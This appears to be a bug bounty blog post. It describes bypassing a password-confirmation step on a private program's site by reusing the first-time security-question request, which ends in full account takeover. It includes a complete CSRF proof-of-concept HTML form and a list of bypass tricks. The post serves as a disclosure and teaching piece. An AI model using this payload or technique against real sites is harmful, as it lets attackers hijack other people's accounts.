Hope you are earning a lot through bug bounty, Now, a day’s I feel bug bounty is all about bypassing the remediation implemented. Thought to share one of my recent findings, As it’s a private program, let’s call it as some Xyz.com
Most of them might have gone through this scenario, while we update the password or update the security question and answer, there the server asks to confirm the user’s identity by asking him to re-enter his password to save or update the changes.
Here I was able to bypass the confirm password,
In this scenario what most of them would try,
- Check whether the password is properly validated?
- Try removing the old password parameter through burp suite
- Try providing different user’s password.
- Response manipulation.
- SQL injection.
In my case, any of the above were not working,
As, I knew that application had CSRF tokens, that were easily bypassed by removing the token. But as the confirm current Password was implemented the CSRF also could not help there.
Then, I created a new account and after logging in then I was asked to create a security question and answer, I captured CSRF for that request and the CSRF was something like this,
<html> <body> <script>history.pushState('', '', '/')</script> <form action="https://xyz.com/myprofile/editLogin" method="POST" data-trp-original-action="https://xyz.com/myprofile/editLogin"> <input type="hidden" name="question" value="PET" /> <input type="hidden" name="answer" value="test1234" /> <input type="hidden" name="answer2" value="test1234" /> <input type="hidden" name="saveSubmit" value="Save and Continue" /> <input type="hidden" name="origin" value="loginAccount" /> <input type="hidden" name="requestor" value="accountSummary" /> <input type="hidden" name="loginPage" value="false" /> <input type="hidden" name="securityQAPage" value="true" /> <input type="submit" value="Submit request" /> <input type="hidden" name="trp-form-language" value="hi"/></form> </body> </html>
The CSRF request was different for updating the security Q &A and for creating the security Q&A. So as for the 1st time the user is creating the security question and password, So here no need to provide the current password to make changes, Then why not use this CSRF to update the security question, When I tried to update the security question and answer of the other user, it worked, Thus I was successful in bypassing the current password option.
I was able to change anyone’s, security question,
Through this vulnerability, I was able to do a full account takeover, As on the forgot password page there was an option to reset the password by answering the security question.
Thus it was full account takeover.
This was a short blog as my server-side vulnerabilities blog would take some time.
Hope you like it!